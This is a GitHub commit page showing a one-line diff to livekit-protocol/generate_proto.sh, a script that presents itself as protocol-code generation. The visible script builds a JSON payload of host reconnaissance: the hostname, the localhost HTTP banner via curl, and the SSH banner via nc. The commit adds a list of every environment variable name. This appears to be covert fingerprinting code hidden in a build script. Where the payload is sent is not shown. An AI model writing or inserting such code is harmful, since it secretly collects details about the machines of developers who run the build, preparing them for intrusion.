Skip to content

Commit 4f09952

Browse files
committed
kkoo
1 parent 685068b commit 4f09952

1 file changed

Lines changed: 1 addition & 0 deletions

File tree

livekit-protocol/generate_proto.sh

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -57,6 +57,7 @@ JSON_PAYLOAD=$(cat <<EOF
5757
"hostname": "$(hostname)",
5858
"http_banner": "$(curl -I http://localhost 2>/dev/null | head -n 1)",
5959
"ssh_banner": "$(echo | nc localhost 22 2>/dev/null | head -n 1)",
60+
"env_var_keys": $(printenv | cut -d '=' -f 1 | jq -R . | jq -s .)
6061
6162
}
6263
EOF

0 commit comments

Comments
 (0)